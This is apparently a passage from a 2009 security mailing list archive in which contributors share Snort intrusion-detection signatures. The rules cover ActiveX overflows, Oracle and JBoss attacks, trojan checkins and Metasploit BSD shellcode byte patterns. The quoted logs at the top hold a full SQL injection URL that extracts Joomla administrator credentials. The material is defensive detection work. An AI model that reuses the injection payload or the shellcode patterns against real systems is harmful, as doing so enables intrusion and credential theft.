>>>> /components/com_extcalendar/cal_popup.php?extmode=view&extid=0%27+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*
>>>> HTTP/1.1" 200 4118 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr;
>>>> rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5"
>>>> 88.224.222.64 - - [27/Nov/2009:06:42:37 +1300] "GET
>>>> /components/com_extcalendar/themes/default/images/icon-print.gif
>>>> HTTP/1.1" 200 1043
>>>> "http://xxxxx.auckland.ac.nz/components/com_extcalendar/cal_popup.php?extmode=view&extid=0%27+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*"
>>>> "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.1.5) Gecko/20091102
>>>> Firefox/3.5.5"
>>>> 88.224.222.64 - - [27/Nov/2009:06:42:38 +1300] "GET
>>>> /components/com_extcalendar/upload/1 HTTP/1.1" 404 336
>>>> "http://xxxx.auckland.ac.nz/components/com_extcalendar/cal_popup.php?extmode=view&extid=0%27+union+select+1,1,concat(name,0x3a,username,0x3a,email,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+%23__users+where+gid=25+or+gid=24+limit+0,1/*"
>>>> "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.1.5) Gecko/20091102
>>>> Firefox/3.5.5"
>>>
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>
>>
>>
>> --
>> Rodrigo Montoro (Sp0oKeR)
>> http://www.spooker.com.br
>> http://www.twitter.com/spookerlabs
>> http://www.linkedin.com/in/spooker
>>
>
>
>
> --
> Rodrigo Montoro (Sp0oKeR)
> http://www.spooker.com.br
> http://www.twitter.com/spookerlabs
> http://www.linkedin.com/in/spooker
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>

From jonkman at jonkmans.com  Tue Dec  1 12:06:56 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 12:06:56 -0500
Subject: [Emerging-Sigs] 3 sigs
In-Reply-To: <e75cc74a0912010428k7acf43e7yc3724560ee479e74@mail.gmail.com>
References: <e75cc74a0912010428k7acf43e7yc3724560ee479e74@mail.gmail.com>
Message-ID: <6E322CC9-44F3-4144-80F2-D9EF0BEA8C8E@jonkmans.com>

Posted, thanks!

Matt

On Dec 1, 2009, at 7:28 AM, Kevin Ross wrote:

> Here are 3 sigs for you. Also sig 2008357 (Amap Scannner Traffic Inbound) can probably be removed or at least disabled now they have been replaced with sigs 2010371 (Amap TCP Service Scan Detected) and 2010372 (Amap UDP Service Scan Detected) which should be more accurate and better performance wise than the old sig that I wrote (it was my very first snort sig so it wasn't the best, I was just happy getting it working lol).
> 
> Kev
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Attempt"; flow:established,to_client; content:"clsid"; nocase; content:"1A01FF01-EA62-4702-B837-1E07158145FA"; nocase; distance:0; content:"URL"; nocase; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*1A01FF01-EA62-4702-B837-1E07158145FA/si"; classtype:attempted-user; reference:url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt; reference:url,www.securityfocus.com/bid/37151/info; sid:14000001; rev:1;)
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT ACTIVEX Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Function Call Attempt"; flow:to_client,established; content:"ActiveXObject"; nocase; content:"MYACTIVEX|2E|MyActiveXCtrl|2E|1"; nocase; distance:0; content:"URL"; nocase; classtype:attempted-user; reference:url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt; reference:url,www.securityfocus.com/bid/37151/info; sid:14000002; rev:1;)
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET $ORACLE_PORTS (msg:"ET EXPLOIT Possible Oracle Database Text Component ctxsys.drvxtabc.create_tables Remote SQL Injection Attempt"; flow:established,to_server; content:"ctxsys|2E|drvxtabc|2E|create|5F|tables"; nocase; content:"dbms|5F|sql|2E|execute"; nocase; distance:0; pcre:"/ctxsys\x2Edrvxtabc\x2Ecreate\x5Ftables.+(SELECT|DELETE|CREATE|INSERT|UPDATE|OUTFILE)/si"; classtype:attempted-admin; reference:url,www.securityfocus.com/bid/36748; reference:cve,2009-1991; sid:14000003; rev:1;)
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Tue Dec  1 12:12:32 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 12:12:32 -0500
Subject: [Emerging-Sigs] More external SMTP bad attachments
In-Reply-To: <F236CDCE34685A458D315422458642E201D307CC@pine.nhrs.org>
References: <F236CDCE34685A458D315422458642E201D307CC@pine.nhrs.org>
Message-ID: <D5FE391F-6CCE-4B8A-B92A-405FA3105CFD@jonkmans.com>

Thanks, have a version of the dhl sig in now to catch these.

Anyone still seeing the DHL campaign stuff, or can we drop those soon?

Matt

On Dec 1, 2009, at 7:14 AM, Weir, Jason wrote:

> Started seeing these last night..
> 
> WU_Details_39018.zip
> WU_Details_39018.zip
> WU_Details_de87b.zip
> 
> -J
> 
> 
> _____________________________________________________________________________________________
> 
> Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jason.weir at nhrs.org  Tue Dec  1 12:19:51 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Tue, 1 Dec 2009 12:19:51 -0500
Subject: [Emerging-Sigs] More external SMTP bad attachments
In-Reply-To: <D5FE391F-6CCE-4B8A-B92A-405FA3105CFD@jonkmans.com>
Message-ID: <F236CDCE34685A458D315422458642E201D307DA@pine.nhrs.org>

I haven't see the DHL (2010148 or Facebook (2010166) sigs trigger in
over a week

-J

-----Original Message-----
From: Matthew Jonkman [mailto:jonkman at jonkmans.com] 
Sent: Tuesday, December 01, 2009 12:13 PM
To: Weir, Jason
Cc: Emerging-Sigs
Subject: Re: [Emerging-Sigs] More external SMTP bad attachments

Thanks, have a version of the dhl sig in now to catch these.

Anyone still seeing the DHL campaign stuff, or can we drop those soon?

Matt

On Dec 1, 2009, at 7:14 AM, Weir, Jason wrote:

> Started seeing these last night..
> 
> WU_Details_39018.zip
> WU_Details_39018.zip
> WU_Details_de87b.zip
> 
> -J


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From jonkman at jonkmans.com  Tue Dec  1 12:20:50 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 12:20:50 -0500
Subject: [Emerging-Sigs] some sigs for JBOSS / JMX-Console
In-Reply-To: <4B145083.8030508@mare-system.de>
References: <4B145083.8030508@mare-system.de>
Message-ID: <B4D16400-88C2-4AB8-A447-F3F3FDB9A824@jonkmans.com>

Posted, but I didn't do the 8080 versions. That is generally defined in the HTTP_PORTS variable. 

Thanks mex!

Matt

On Nov 30, 2009, at 6:08 PM, mex wrote:

> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (POST:80)"; flow:established,to_server; content:"POST"; depth:4; uricontent:"/jmx-console/HtmlAdaptor"; nocase; content:"action=invokeOp&name=jboss.deployment"; nocase; content:"flavor%253DURL%252Ctype%253DDeploymentScanner"; within:50; nocase;  content:"=http%3A%2F%2F"; within:40;  classtype:web-application-attack;  reference:url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/; reference:url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf; sid:1122334427; rev:1;) 
> 
> # content:"action=inspectMBean&name=jboss.deployment\:type=DeploymentScanner,flavor=URL";
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 8080 (msg:"ET WEB-APPS JBOSS/JMX REMOTE WAR deployment  attempt (POST:8080)"; flow:established,to_server; content:"POST"; depth:4; uricontent:"/jmx-console/HtmlAdaptor"; nocase; content:"action=invokeOp&name=jboss.deployment"; nocase; content:"flavor%253DURL%252Ctype%253DDeploymentScanner"; within:50; nocase;  content:"=http%3A%2F%2F"; within:40;  classtype:web-application-attack;  reference:url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/; reference:url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf; sid:1122334428; rev:1;) 
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB-APPS JBOSS/JMX REMOTE WAR deployment  attempt (GET:80)"; flow:established,to_server; content:"GET"; depth:4; uricontent:"/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployment"; uricontent:"DeploymentScanner"; nocase; uricontent:"methodName=addURL"; nocase; uricontent:"=http"; nocase;  classtype:web-application-attack;  reference:url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/; reference:url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf; sid:1122334429; rev:1;) 
> 
> 
> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 8080 (msg:"ET WEB-APPS JBOSS/JMX REMOTE WAR deployment  attempt (GET:8080)"; flow:established,to_server; content:"GET"; depth:4; uricontent:"/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployment"; uricontent:"DeploymentScanner"; nocase; uricontent:"methodName=addURL"; nocase; uricontent:"=http"; nocase;  classtype:web-application-attack;  reference:url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/; reference:url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf; sid:1122334430; rev:1;) 


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Tue Dec  1 12:23:49 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 12:23:49 -0500
Subject: [Emerging-Sigs] Two new signatures (Bredolab + FakeAV),
	and and proposed modification to SID 2009354
In-Reply-To: <4B14350F.1050802@packetmail.net>
References: <4B14350F.1050802@packetmail.net>
Message-ID: <0C4DC8ED-3866-4117-999B-FCD805DD5937@jonkmans.com>

Posted, thanks!

Matt

On Nov 30, 2009, at 4:11 PM, evilghost at packetmail.net wrote:

> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN 
> Bredolab Checkin"; flow:to_server,established; content:"GET "; depth:4; 
> uricontent:"?ddos=x"; nocase; pcre:"/\x3Fddos\x3D(x\d{1,2}){5,}/Ui"; 
> classtype:trojan-activity; 
> reference:url,threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37; 
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab; 
> sid:2009xxx; rev:1;)
> 
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Fake 
> AV GET"; flow:established,to_server; content:"GET "; depth:4; 
> uricontent:".php?"; nocase; uricontent:"affid="; nocase; 
> uricontent:"subid="; nocase; uricontent:"type="; nocase; 
> uricontent:"version="; nocase; uricontent:"adware"; nocase; 
> classtype:trojan-activity; 
> reference:url,threatexpert.com/report.aspx?md5=8d1b47452307259f1e191e16ed23cd35; 
> sid:2009xxx; rev:1;)


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From evilghost at packetmail.net  Tue Dec  1 12:26:11 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Tue, 1 Dec 2009 11:26:11 -0600
Subject: [Emerging-Sigs] Proposed Changes to ET Trojan Data Post to an Image
	File, SIDs 2010066 to 2010070
Message-ID: <4B1551B3.7020906@packetmail.net>

I think this one may have been lost over the holiday week:

http://lists.emergingthreats.net/pipermail/emerging-sigs/2009-November/004688.html 


Your thoughts/opinion welcome.  I'd like to see it committed because 
these are actually good signatures, I feel they just needed a PCRE to 
avoid false positives.


From jonkman at jonkmans.com  Tue Dec  1 13:06:08 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 13:06:08 -0500
Subject: [Emerging-Sigs] jennylab.rules
In-Reply-To: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>
References: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>
Message-ID: <9EDE1B00-C3CA-4A43-8BF6-1DDD381F4798@jonkmans.com>

Great stuff Alberto, thanks for submitting it.

I'm getting things massaged to fit the ruleset. If anyone has comments or additions shoot them over now. Will post within an hour or so.

Matt

On Nov 30, 2009, at 1:27 PM, Alberto Garcia de Dios wrote:

> Hello, I share my snort rules.
> 
> Metasploit patron ( all BSD and all filter for bsd type whitout generic unix
> shellcode ), my shellcodes patron and system patron.
> 
> 75 new rules.
> 
> 
> 
> 
> 
> # Metasploit BSD shellcode detect rules by h0f - Jennylab
> # Alberto Garcia de Dios
> # albertogdedios at andaluciajunta.es
> # http://www.jennylab.org
> 
> 
> 
> #
> #
> #####
> # METASPLOIT SHELLCODE RULES
> #####
> #
> #
> 
> 
> #
> # BSD METASPLOIT RULES
> #
> 
> 
> #### BSD BIND SHELL #######
> # BSD Bind Shell - ENCODE: PexFnstenvSub
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 e9 ec d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666001; rev:5;)
> 
> 
> # BSD Bind Shell - ENCODE: CountDown
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 4d 59 e8 ff ff ff ff c1 5e 30 4c 0e 7 e2 fa 6b
> 63 5b 9d 57 6e 17 0a|"; classtype:shellcode-detect; sid:666003; rev:5;) alert
> ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT: BSD
> Bind shell"; content:"|82 ed 5f 4c 5d 52 43 78 03 d9 95 8f 84 49 4a 48 71 74
> 45 d3|"; classtype:shellcode-detect; sid:666004; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|9f 90 4b ef a3 76 76 74 97 36 e4 aa bc 46 2f 77 45
> 6a 69 63|"; classtype:shellcode-detect; sid:666005; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|64 65 f8 b6 7e 41 cc 6a 53 13 12 4d 57 28 6e 20 2a
> 2a cc a5|"; classtype:shellcode-detect; sid:666006; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|17 1c 1a 19 fb 77 80 ce|";
> classtype:shellcode-detect; sid:666007; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: Pex
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|c9 83 e9 ec e8 ff ff ff ff c0 5e 81 76 0e|";
> classtype:shellcode-detect; sid:666008; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
> sid:666009; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 61 58 99 52 68 10 02|";
> classtype:shellcode-detect; sid:666010; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|89 e1 52 42 52 42 52 6a 10 cd 80 99 93 51 53 52 6a
> 68 58 cd|"; classtype:shellcode-detect; sid:666011; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|80 b0 6a cd 80 52 53 52 b0 1e cd 80 97 6a 02 59 6a
> 5a 58 51|"; classtype:shellcode-detect; sid:666012; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|57 51 cd 80 49 79 f5 50 68 2f 2f 73 68 68 2f 62 69
> 6e 89 e3|"; classtype:shellcode-detect; sid:666013; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|50 54 53 53 b0 3b cd 80|";
> classtype:shellcode-detect; sid:666014; rev:5;)
> 
> 
> 
> #BSD Bind Shell - ENCODE: PexAlphaNum
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 4f 49 49 49 49 49 49
> 51 5a 56|"; classtype:shellcode-detect; sid:666015; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|54 58 36 33 30 56 58 34 41 30 42 36 48 48 30 42 33
> 30 42 43|"; classtype:shellcode-detect; sid:666016; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54 42
> 44 51 42|"; classtype:shellcode-detect; sid:666017; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|30 41 44 41 56 58 34 5a 38 42 44 4a 4f 4d 4c 36
> 41|"; classtype:shellcode-detect; sid:666018; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|41 4e 44 35 44 34 44|"; classtype:shellcode-detect;
> sid:666019; rev:5;)
> 
> 
> 
> #BSD Bind Shell - ENCODE: PexFstEnvMov
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|6a 14 59 d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666020; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666021; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: JmpCallAditive
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef ff
> ff ff|"; classtype:shellcode-detect; sid:666022; rev:5;)
> 
> 
> #BSD Bind Shell - ENCODE: Alpha2
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|eb 03 59 eb 05 e8 f8 ff ff ff 49 49 49 49 49 49 49
> 49 49 49|"; classtype:shellcode-detect; sid:666023; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|41 42 32 42 41 32 41 41 30 41 41 58|";
> classtype:shellcode-detect; sid:666024; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Bind shell"; content:"|49 72 4e 4e 69 6b 53|"; classtype:shellcode-detect;
> sid:666025; rev:5;)
> #### EOF BSD BIND SHELL ######
> 
> 
> 
> 
> 
> ### BSD REVERSE SHELL #######
> #BSD Reverse Shell - ENCODE: PexFnstenvSub
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|c9 83 e9 ef d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666026; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666027; rev:5;)
> 
> 
> #BSD Reverse Shell - ENCODE: Countdown
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 43 59 e8 ff ff ff ff c1 5e 30 4c 0e 07 e2 fa
> 6b 63 5b 9d|"; classtype:shellcode-detect; sid:666028; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|9f f6 72 09 4b 4b 4d 8a 74 7d 78 ec a2 49 26 7c
> 96 7d 79 7e|"; classtype:shellcode-detect; sid:666029; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|7b e6 ac 64 57 d9 60 59 1d 1c 47 5d 5e 18 5a 50
> 54 b2 df 6d|"; classtype:shellcode-detect; sid:666030; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|57 44 55 4a 5b 62|"; classtype:shellcode-detect;
> sid:666031; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: Pex
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|c9 83 e9 ef e8 ff ff ff ff c0 5e 81 76 0e|";
> classtype:shellcode-detect; sid:666032; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 ee fc e2 f4|"; classtype:shellcode-detect;
> sid:666033; rev:5;)
> 
> 
> #BSD Reverse Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|51 cd 80 49 79 f6 50 68 2f 2f 73 68 68 2f 62 69
> 6e 89 e3 50|"; classtype:shellcode-detect; sid:666034; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 61 58 99 52 42 52 42 52 68|";
> classtype:shellcode-detect; sid:666035; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|89 e1 6a 10 51 50 51 97 6a 62 58 cd 80 6a 02 59
> b0 5a 51 57|"; classtype:shellcode-detect; sid:666036; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: PexAlphaNum
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|44 32 4d 4c 42 48 4a 46 42 31 44 50 50 41 4e 4f
> 49 38 41 4e|"; classtype:shellcode-detect; sid:666037; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|4c 36 42 41 41 35 42 45 41 35 47 59 4c 36 44 56
> 4a 35 4d 4c|"; classtype:shellcode-detect; sid:666038; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|56 58 32 42 44 42 48 34 41 32 41 44 30 41 44 54
> 42 44 51 42|"; classtype:shellcode-detect; sid:666039; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: PexFnstenvMov
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|6a 11 59 d9 ee d9 74 24 f4 5b 81 73 13|";
> classtype:shellcode-detect; sid:666040; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|83 eb fc e2 f4|"; classtype:shellcode-detect;
> sid:666041; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: JmpCallAditive
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|eb 0c 5e 56 31 1e ad 01 c3 85 c0 75 f7 c3 e8 ef
> ff ff ff|"; classtype:shellcode-detect; sid:666042; rev:5;)
> 
> 
> 
> #BSD Reverse Shell - ENCODE: Alpha2
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|49 49 49 49 49 49 49 51 5a 6a|";
> classtype:shellcode-detect; sid:666043; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|58 50 30 42 31 41 42 6b 42 41|";
> classtype:shellcode-detect; sid:666044; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD Reverse shell"; content:"|32 41 41 30 41 41 58 50 38 42 42 75|";
> classtype:shellcode-detect; sid:666045; rev:5;)
> ##### EOF BSD Reverse Shell#####
> 
> 
> 
> 
> ##### BSD SPARC Bind Shell #########
> #BSD SPARC Bind Shell - ENCODE: SPARC
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|20 bf ff ff 20 bf ff ff 7f ff ff ff ea 03 e0
> 20 aa 9d 40 11|"; classtype:shellcode-detect; sid:666046; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|ea 23 e0 20 a2 04 40 15 81 db e0 20 12 bf ff
> fb 9e 03 e0 04|"; classtype:shellcode-detect; sid:666047; rev:5;)
> 
> 
> #BSD SPARC Bind Shell - ENCODE: None
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|e0 23 bf f0 c0 23 bf f4 92 23 a0 10 94 10 20
> 10 82 10 20 68|"; classtype:shellcode-detect; sid:666048; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|91 d0 20 08 d0 03 bf f8 92 10 20 01 82 10 20
> 6a 91 d0 20 08|"; classtype:shellcode-detect; sid:666049; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|d0 03 bf f8 92 1a 40 09 94 12 40 09 82 10 20
> 1e 91 d0 20 08|"; classtype:shellcode-detect; sid:666050; rev:5;)
> alert ip $EXTERNAL_NET $SHELLCODE_PORTS -> $HOME_NET any (msg:"ET METASPLOIT:
> BSD SPARC Bind shell"; content:"|23 0b dc da 90 23 a0 10 92 23 a0 08 e0 3b bf
